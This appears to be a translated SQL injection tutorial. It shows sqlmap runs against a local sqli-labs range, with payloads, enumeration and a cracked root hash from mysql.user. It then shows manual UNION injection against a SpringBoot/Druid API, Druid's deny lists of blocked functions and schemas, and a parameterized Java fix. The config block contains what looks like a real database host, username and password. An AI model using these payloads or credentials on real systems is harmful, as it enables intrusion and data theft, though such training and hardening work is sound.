Set up the sqli-labs practice range
Reference: https://blog.csdn.net/qq_41567696/article/details/140733516
Install the injection tool sqlmap
Reference: https://blog.csdn.net/qq_42321190/article/details/138534631
Install penetration scanning tools
AppScan, see the official site: https://www.appscan.net.cn/
Nessus, see the official site: http://www.tenable.com/products/nessus/select-your-operating-system
Scan for vulnerabilities (the range's vulnerabilities are already known, so this step can be skipped)
Scan the site with AppScan; the report is as follows
Demonstration of exploiting the range's injection vulnerability with sqlmap
Probing
PS D:\software\softwarefile\sqlmapproject-sqlmap-1.8.8-1-gedb9a15\sqlmapproject-sqlmap-edb9a15> python .\sqlmap.py -u http://localhost/sqli-labs/Less-1/?id=2 -batch
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.8.8.1#dev}
|_ -| . ["]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:17:27 /2024-08-23/

[15:17:27] [INFO] resuming back-end DBMS 'mysql'
[15:17:27] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2' AND 5551=5551 AND 'Fjso'='Fjso

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: id=2' AND GTID_SUBSET(CONCAT(0x717a767171,(SELECT (ELT(7013=7013,1))),0x717a627171),7013) AND 'jFMF'='jFMF

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=2' AND (SELECT 7580 FROM (SELECT(SLEEP(5)))aHBV) AND 'pZbg'='pZbg

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-9175' UNION ALL SELECT NULL,NULL,CONCAT(0x717a767171,0x794e62524376556c706c4e7575565143754a61714d427462456d5556435a796464786f5a554a6778,0x717a627171)-- -
---
[15:17:27] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.15.11, PHP 5.6.9
back-end DBMS: MySQL >= 5.6
[15:17:27] [INFO] fetched data logged to text files under 'C:\Users\jiangk\AppData\Local\sqlmap\output\localhost'

[*] ending @ 15:17:27 /2024-08-23/
Enumerate databases
PS D:\software\softwarefile\sqlmapproject-sqlmap-1.8.8-1-gedb9a15\sqlmapproject-sqlmap-edb9a15> python .\sqlmap.py -u http://localhost/sqli-labs/Less-1/?id=2 --dbs

[*] starting @ 15:23:26 /2024-08-23/

[15:23:27] [INFO] resuming back-end DBMS 'mysql'
[15:23:27] [INFO] testing connection to the target URL
[15:23:27] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.9, Nginx 1.15.11
back-end DBMS: MySQL >= 5.6
[15:23:27] [INFO] fetching database names
available databases [7]:
[*] challenges
[*] information_schema
[*] mysql
[*] performance_schema
[*] security
[*] sys
[*] test
Enumerate tables
PS D:\software\softwarefile\sqlmapproject-sqlmap-1.8.8-1-gedb9a15\sqlmapproject-sqlmap-edb9a15> python .\sqlmap.py -u http://localhost/sqli-labs/Less-1/?id=2 --tables -D "mysql"

[*] starting @ 15:27:13 /2024-08-23/

[15:27:14] [INFO] resuming back-end DBMS 'mysql'
[15:27:14] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
[15:27:14] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.9, Nginx 1.15.11
back-end DBMS: MySQL >= 5.6
[15:27:14] [INFO] fetching tables for database: 'mysql'
Database: mysql
[31 tables]
+---------------------------+
| event                     |
| plugin                    |
| user                      |
| columns_priv              |
| db                        |
| engine_cost               |
| func                      |
| general_log               |
| gtid_executed             |
| help_category             |
| help_keyword              |
| help_relation             |
| help_topic                |
| innodb_index_stats        |
| innodb_table_stats        |
| ndb_binlog_index          |
| proc                      |
| procs_priv                |
| proxies_priv              |
| server_cost               |
| servers                   |
| slave_master_info         |
| slave_relay_log_info      |
| slave_worker_info         |
| slow_log                  |
| tables_priv               |
| time_zone                 |
| time_zone_leap_second     |
| time_zone_name            |
| time_zone_transition      |
| time_zone_transition_type |
+---------------------------+

[15:27:14] [INFO] fetched data logged to text files under 'C:\Users\jiangk\AppData\Local\sqlmap\output\localhost'
Enumerate table columns
PS D:\software\softwarefile\sqlmapproject-sqlmap-1.8.8-1-gedb9a15\sqlmapproject-sqlmap-edb9a15> python .\sqlmap.py -u http://localhost/sqli-labs/Less-1/?id=2 --columns -T "user" -D "mysql"

[*] starting @ 15:29:23 /2024-08-23/

[15:29:23] [INFO] resuming back-end DBMS 'mysql'
[15:29:23] [INFO] testing connection to the target URL
[15:29:23] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.15.11, PHP 5.6.9
back-end DBMS: MySQL >= 5.6
[15:29:23] [INFO] fetching columns for table 'user' in database 'mysql'
Database: mysql
Table: user
[45 columns]
+------------------------+-----------------------------------+
| Column                 | Type                              |
+------------------------+-----------------------------------+
| Host                   | char(60)                          |
| max_user_connections   | int(11) unsigned                  |
| plugin                 | char(64)                          |
| User                   | char(32)                          |
| account_locked         | enum('N','Y')                     |
| Alter_priv             | enum('N','Y')                     |
| Alter_routine_priv     | enum('N','Y')                     |
| authentication_string  | text                              |
| Create_priv            | enum('N','Y')                     |
| Create_routine_priv    | enum('N','Y')                     |
| Create_tablespace_priv | enum('N','Y')                     |
| Create_tmp_table_priv  | enum('N','Y')                     |
| Create_user_priv       | enum('N','Y')                     |
| Create_view_priv       | enum('N','Y')                     |
| Delete_priv            | enum('N','Y')                     |
| Drop_priv              | enum('N','Y')                     |
| Event_priv             | enum('N','Y')                     |
| Execute_priv           | enum('N','Y')                     |
| File_priv              | enum('N','Y')                     |
| Grant_priv             | enum('N','Y')                     |
| Index_priv             | enum('N','Y')                     |
| Insert_priv            | enum('N','Y')                     |
| Lock_tables_priv       | enum('N','Y')                     |
| max_connections        | int(11) unsigned                  |
| max_questions          | int(11) unsigned                  |
| max_updates            | int(11) unsigned                  |
| password_expired       | enum('N','Y')                     |
| password_last_changed  | timestamp                         |
| password_lifetime      | smallint(5) unsigned              |
| Process_priv           | enum('N','Y')                     |
| References_priv        | enum('N','Y')                     |
| Reload_priv            | enum('N','Y')                     |
| Repl_client_priv       | enum('N','Y')                     |
| Repl_slave_priv        | enum('N','Y')                     |
| Select_priv            | enum('N','Y')                     |
| Show_db_priv           | enum('N','Y')                     |
| Show_view_priv         | enum('N','Y')                     |
| Shutdown_priv          | enum('N','Y')                     |
| ssl_cipher             | blob                              |
| ssl_type               | enum('','ANY','X509','SPECIFIED') |
| Super_priv             | enum('N','Y')                     |
| Trigger_priv           | enum('N','Y')                     |
| Update_priv            | enum('N','Y')                     |
| x509_issuer            | blob                              |
| x509_subject           | blob                              |
+------------------------+-----------------------------------+

[15:29:23] [INFO] fetched data logged to text files under 'C:\Users\jiangk\AppData\Local\sqlmap\output\localhost'

[*] ending @ 15:29:23 /2024-08-23/
Dump the user table and try to crack weak passwords (try online cracking: https://www.cmd5.com/)
PS D:\software\softwarefile\sqlmapproject-sqlmap-1.8.8-1-gedb9a15\sqlmapproject-sqlmap-edb9a15> python .\sqlmap.py -u http://localhost/sqli-labs/Less-6/?id=2 --dump -C "User,authentication_string" -T "user" -D "mysql"

[*] starting @ 15:30:34 /2024-08-23/

[15:30:35] [INFO] resuming back-end DBMS 'mysql'
[15:30:35] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
[15:30:35] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.15.11, PHP 5.6.9
back-end DBMS: MySQL >= 5.6
[15:30:35] [INFO] fetching entries of column(s) '`User`,authentication_string' for table 'user' in database 'mysql'
[15:30:35] [INFO] resumed: 'mysql.session'
[15:30:35] [INFO] resumed: '*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE'
[15:30:35] [INFO] resumed: 'mysql.sys'
[15:30:35] [INFO] resumed: '*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE'
[15:30:35] [INFO] resumed: 'root'
[15:30:35] [INFO] resumed: '*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B'
[15:30:35] [INFO] recognized possible password hashes in column 'authentication_string'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[15:30:41] [INFO] writing hashes to a temporary file 'C:\Users\jiangk\AppData\Local\Temp\sqlmapas0muzv127312\sqlmaphashes-dasnqica.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[15:30:44] [INFO] using hash method 'mysql_passwd'
[15:30:44] [INFO] resuming password 'root' for hash '*81f5e21e35407d884a6cd4a731aebfb6af209e1b'
Database: mysql
Table: user
[3 entries]
+---------------+--------------------------------------------------+
| User          | authentication_string                            |
+---------------+--------------------------------------------------+
| mysql.session | *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE        |
| mysql.sys     | *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE        |
| root          | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B (root) |
+---------------+--------------------------------------------------+

[15:30:44] [INFO] table 'mysql.`user`' dumped to CSV file 'C:\Users\jiangk\AppData\Local\sqlmap\output\localhost\dump\mysql\user.csv'
[15:30:44] [INFO] fetched data logged to text files under 'C:\Users\jiangk\AppData\Local\sqlmap\output\localhost'

[*] ending @ 15:30:44 /2024-08-23/
SpringBoot + Druid architecture: manual injection demonstration
Injection point: http://172.30.4.31:9690/jiangk_www/apimanager/c1303/api/querydepartment?type=1&areacode=130302
# Response returned when the API endpoint is requested
{"code":"1","msg":"查询成功!","data":[{"pluscode":"130302011","name":"区房产局"},{"pluscode":"130302027","name":"区人防办"},{"pluscode":"130302028","name":"区建设局"},{"pluscode":"130302053","name":"区审批局"},{"pluscode":"130302061","name":"区住建局"},{"pluscode":"130302028","name":"区城建局"},{"pluscode":"130302010","name":"区规划局"},{"pluscode":"130302019","name":"区国土局"},{"pluscode":"130302003","name":"区民政局"},{"pluscode":"130302016","name":"区科技局"},{"pluscode":"130302032","name":"区畜牧局"},{"pluscode":"130302018","name":"区交通局"},{"pluscode":"130302014","name":"区农业局"},{"pluscode":"130302002","name":"区教育局"},{"pluscode":"130302013","name":"区粮食局"},{"pluscode":"130302026","name":"区编委办"},{"pluscode":"130302031","name":"区司法局"},{"pluscode":"130302025","name":"区人社局"},{"pluscode":"130302021","name":"区档案馆"},{"pluscode":"130302022","name":"区卫计局"},{"pluscode":"130302001","name":"区发改局"},{"pluscode":"130302030","name":"区地税局"},{"pluscode":"130302017","name":"区市政处"},{"pluscode":"130302015","name":"区财政局"},{"pluscode":"130302023","name":"区环保局"},{"pluscode":"130302004","name":"区文广新局"},{"pluscode":"130302009","name":"区水务局"},{"pluscode":"130302007","name":"区城管局"},{"pluscode":"130302008","name":"区市监局"},{"pluscode":"130302029","name":"区国税局"},{"pluscode":"130302012","name":"区公安局"},{"pluscode":"130302024","name":"区安监局"},{"pluscode":"130302006","name":"区园林局"},{"pluscode":"130302005","name":"区林业局"}]}
Injection test
# Request URL: http://172.30.4.31:9690/jiangk_www/apimanager/c1303/api/querydepartment?type=1&areacode=130302' union select 1,2 from dual where rand()>'0
# The returned data now ends with an extra object holding the values 1,2
{"code":"1","msg":"查询成功!","data":[{"pluscode":"130302011","name":"区房产局"},{"pluscode":"130302027","name":"区人防办"},{"pluscode":"130302028","name":"区建设局"},{"pluscode":"130302053","name":"区审批局"},{"pluscode":"130302061","name":"区住建局"},{"pluscode":"130302028","name":"区城建局"},{"pluscode":"130302010","name":"区规划局"},{"pluscode":"130302019","name":"区国土局"},{"pluscode":"130302003","name":"区民政局"},{"pluscode":"130302016","name":"区科技局"},{"pluscode":"130302032","name":"区畜牧局"},{"pluscode":"130302018","name":"区交通局"},{"pluscode":"130302014","name":"区农业局"},{"pluscode":"130302002","name":"区教育局"},{"pluscode":"130302013","name":"区粮食局"},{"pluscode":"130302026","name":"区编委办"},{"pluscode":"130302031","name":"区司法局"},{"pluscode":"130302025","name":"区人社局"},{"pluscode":"130302021","name":"区档案馆"},{"pluscode":"130302022","name":"区卫计局"},{"pluscode":"130302001","name":"区发改局"},{"pluscode":"130302030","name":"区地税局"},{"pluscode":"130302017","name":"区市政处"},{"pluscode":"130302015","name":"区财政局"},{"pluscode":"130302023","name":"区环保局"},{"pluscode":"130302004","name":"区文广新局"},{"pluscode":"130302009","name":"区水务局"},{"pluscode":"130302007","name":"区城管局"},{"pluscode":"130302008","name":"区市监局"},{"pluscode":"130302029","name":"区国税局"},{"pluscode":"130302012","name":"区公安局"},{"pluscode":"130302024","name":"区安监局"},{"pluscode":"130302006","name":"区园林局"},{"pluscode":"130302005","name":"区林业局"},{"pluscode":"1","name":"2"}]}
Druid's SQL firewall (the wall filter) checks each statement before it is executed, so part of the injected SQL is blocked
# Back-end error during the injection attempt; request URL: http://172.30.4.31:9690/jiangk_www/apimanager/c1303/api/querydepartment?type=1&areacode=130302' union select database(),2 from dual where rand()>'0
# Back-end error message
2024-08-23 16:43:49,269 WARN --- [qtp891193010-99] o.h.e.jdbc.spi.SqlExceptionHelper : SQL Error: 0, SQLState: null
2024-08-23 16:43:49,269 ERROR --- [qtp891193010-99] o.h.e.jdbc.spi.SqlExceptionHelper : sql injection violation, deny function : database : SELECT A.PLUSCODE, A.NAME FROM T_ORGANIZATION A WHERE LENGTH(PLUSCODE) = 9 and a.status='1' AND A.AREACODE = '130302' union select database(),2 from dual where rand()>'0'
javax.persistence.PersistenceException: org.hibernate.exception.GenericJDBCException: could not prepare statement
    at org.hibernate.jpa.spi.AbstractEntityManagerImpl.convert(AbstractEntityManagerImpl.java:1692)
    at org.hibernate.jpa.spi.AbstractEntityManagerImpl.convert(AbstractEntityManagerImpl.java:1602)
    at org.hibernate.jpa.internal.QueryImpl.getResultList(QueryImpl.java:492)
    ... (omitted)
Caused by: org.hibernate.exception.GenericJDBCException: could not prepare statement
    at org.hibernate.exception.internal.StandardSQLExceptionConverter.convert(StandardSQLExceptionConverter.java:47)
    at org.hibernate.engine.jdbc.spi.SqlExceptionHelper.convert(SqlExceptionHelper.java:109)
    at org.hibernate.engine.jdbc.internal.StatementPreparerImpl$StatementPreparationTemplate.prepareStatement(StatementPreparerImpl.java:182)
    at org.hibernate.engine.jdbc.internal.StatementPreparerImpl.prepareQueryStatement(StatementPreparerImpl.java:148)
    at org.hibernate.loader.Loader.prepareQueryStatement(Loader.java:1929)
    at org.hibernate.loader.Loader.executeQueryStatement(Loader.java:1898)
    at org.hibernate.loader.Loader.executeQueryStatement(Loader.java:1876)
    at org.hibernate.loader.Loader.doQuery(Loader.java:919)
    at org.hibernate.loader.Loader.doQueryAndInitializeNonLazyCollections(Loader.java:336)
    at org.hibernate.loader.Loader.doList(Loader.java:2617)
    at org.hibernate.loader.Loader.doList(Loader.java:2600)
    at org.hibernate.loader.Loader.listIgnoreQueryCache(Loader.java:2429)
    at org.hibernate.loader.Loader.list(Loader.java:2424)
    at org.hibernate.loader.custom.CustomLoader.list(CustomLoader.java:336)
    at org.hibernate.internal.SessionImpl.listCustomQuery(SessionImpl.java:1967)
    at org.hibernate.internal.AbstractSessionImpl.list(AbstractSessionImpl.java:322)
    at org.hibernate.internal.SQLQueryImpl.list(SQLQueryImpl.java:125)
    at org.hibernate.jpa.internal.QueryImpl.list(QueryImpl.java:606)
    at org.hibernate.jpa.internal.QueryImpl.getResultList(QueryImpl.java:483)
    ... 103 more
Caused by: java.sql.SQLException: sql injection violation, deny function : database : SELECT A.PLUSCODE, A.NAME FROM T_ORGANIZATION A WHERE LENGTH(PLUSCODE) = 9 and a.status='1' AND A.AREACODE = '130302' union select database(),2 from dual where rand()>'0'
    at com.alibaba.druid.wall.WallFilter.check(WallFilter.java:727)
    at com.alibaba.druid.wall.WallFilter.connection_prepareStatement(WallFilter.java:253)
    at com.alibaba.druid.filter.FilterChainImpl.connection_prepareStatement(FilterChainImpl.java:472)
    at com.alibaba.druid.filter.FilterAdapter.connection_prepareStatement(FilterAdapter.java:928)
    at com.alibaba.druid.filter.FilterEventAdapter.connection_prepareStatement(FilterEventAdapter.java:122)
    at com.alibaba.druid.filter.FilterChainImpl.connection_prepareStatement(FilterChainImpl.java:472)
    at com.alibaba.druid.proxy.jdbc.ConnectionProxyImpl.prepareStatement(ConnectionProxyImpl.java:342)
    at com.alibaba.druid.pool.DruidPooledConnection.prepareStatement(DruidPooledConnection.java:346)
    at org.hibernate.engine.jdbc.internal.StatementPreparerImpl$5.doPrepare(StatementPreparerImpl.java:146)
    at org.hibernate.engine.jdbc.internal.StatementPreparerImpl$StatementPreparationTemplate.prepareStatement(StatementPreparerImpl.java:172)
    ... 119 more
1. Functions blocked by default once the wall filter is enabled; the list is loaded from the file deny-function.txt inside the jar dependency:
version
load_file
database
schema
user
system_user
session_user
benchmark
current_user
sleep
xmltype
receive_message
2. Tables/schemas blocked by default once the wall filter is enabled; the list is loaded from the file deny-schema.txt inside the jar dependency:
information_schema
mysql
performance_schema
Configuration that enables or disables Druid's SQL firewall: spring.datasource.druid.filters
spring:
  datasource:
    druid:
      primary:
        url: jdbc:mysql://jumpserver.jiangk.com:33061/jiangk?useSSL=false
        username: 60c3f9da-53e1-4354-8c87-7e1a230006eb
        password: q55CGQYjdyNQI8W8
        initial-size: 50
        min-idle: 1
        maxActive: 100
        # Filters for monitoring/statistics interception; wall is the SQL firewall. Removing it lets the injected SQL above execute
        filters: stat,wall,log4j
# Successful injection example, request URL: http://localhost:18080/jiangk_www/apimanager/c1303/api/querydepartment?type=1&areacode=130302' union select database(),2 from dual where rand()>'0
# The response now ends with an extra object holding the database name
{"code":"1","msg":"查询成功!","data":[{"pluscode":"130302011","name":"区房产局"},{"pluscode":"130302027","name":"区人防办"},{"pluscode":"130302028","name":"区建设局"},{"pluscode":"130302053","name":"区审批局"},{"pluscode":"130302061","name":"区住建局"},{"pluscode":"130302028","name":"区城建局"},{"pluscode":"130302010","name":"区规划局"},{"pluscode":"130302019","name":"区国土局"},{"pluscode":"130302003","name":"区民政局"},{"pluscode":"130302016","name":"区科技局"},{"pluscode":"130302032","name":"区畜牧局"},{"pluscode":"130302018","name":"区交通局"},{"pluscode":"130302014","name":"区农业局"},{"pluscode":"130302002","name":"区教育局"},{"pluscode":"130302013","name":"区粮食局"},{"pluscode":"130302026","name":"区编委办"},{"pluscode":"130302031","name":"区司法局"},{"pluscode":"130302025","name":"区人社局"},{"pluscode":"130302021","name":"区档案馆"},{"pluscode":"130302022","name":"区卫计局"},{"pluscode":"130302001","name":"区发改局"},{"pluscode":"130302030","name":"区地税局"},{"pluscode":"130302017","name":"区市政处"},{"pluscode":"130302015","name":"区财政局"},{"pluscode":"130302023","name":"区环保局"},{"pluscode":"130302004","name":"区文广新局"},{"pluscode":"130302009","name":"区水务局"},{"pluscode":"130302007","name":"区城管局"},{"pluscode":"130302008","name":"区市监局"},{"pluscode":"130302029","name":"区国税局"},{"pluscode":"130302012","name":"区公安局"},{"pluscode":"130302024","name":"区安监局"},{"pluscode":"130302006","name":"区园林局"},{"pluscode":"130302005","name":"区林业局"},{"pluscode":"jiangk_test","name":"2"}]}
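The stack trace above shows the query going through Hibernate's native-SQL path (SQLQueryImpl, CustomLoader) with the areacode value already spliced into the statement text, and it shows why the wall filter is only defence in depth: the plain "union select 1,2" passed and only "database()" tripped the deny-function list. The real fix is to stop building the SQL from the request parameter. The following is an added example, not the project's own code: it assumes a JPA EntityManager and the T_ORGANIZATION query from the log, and the class name, the six-digit areacode format and the ?1 bind style are my assumptions.

```java
import javax.persistence.EntityManager;
import javax.persistence.Query;
import java.util.List;
import java.util.regex.Pattern;

// Added example, not the project's code. DepartmentDao is a made-up name; the SQL is the
// statement seen in the Druid log, with the AREACODE comparison left to be filled in.
public class DepartmentDao {

    private static final String BASE_SQL =
        "SELECT A.PLUSCODE, A.NAME FROM T_ORGANIZATION A "
      + "WHERE LENGTH(PLUSCODE) = 9 AND A.STATUS = '1' AND A.AREACODE = ";

    // Assumption: area codes in this API are six digits (the page uses 130302).
    private static final Pattern AREACODE = Pattern.compile("\\d{6}");

    private final EntityManager em;

    public DepartmentDao(EntityManager em) {
        this.em = em;
    }

    // Vulnerable shape implied by the log: the request value is concatenated into the SQL text,
    // so a value such as 130302' union select database(),2 from dual where rand()>'0
    // becomes part of the statement. Druid's wall filter only rejects what its deny lists name.
    @SuppressWarnings("unchecked")
    public List<Object[]> queryDepartmentUnsafe(String areacode) {
        String sql = BASE_SQL + "'" + areacode + "'";
        return em.createNativeQuery(sql).getResultList();
    }

    // Hardened: the SQL text is constant and areacode is sent as a bind value, so the same input
    // is compared as a literal string and simply matches no row. The format check is an extra
    // layer that also rejects the quote character before the query is ever built.
    @SuppressWarnings("unchecked")
    public List<Object[]> queryDepartment(String areacode) {
        if (areacode == null || !AREACODE.matcher(areacode).matches()) {
            throw new IllegalArgumentException("areacode must be exactly six digits");
        }
        Query q = em.createNativeQuery(BASE_SQL + "?1");
        q.setParameter(1, areacode);
        return q.getResultList();
    }
}
```

With the parameterized version in place, the wall filter can stay enabled as a second line of defence, and its "sql injection violation" log lines become a useful signal that someone is probing the endpoint rather than the only thing standing between the request and the database.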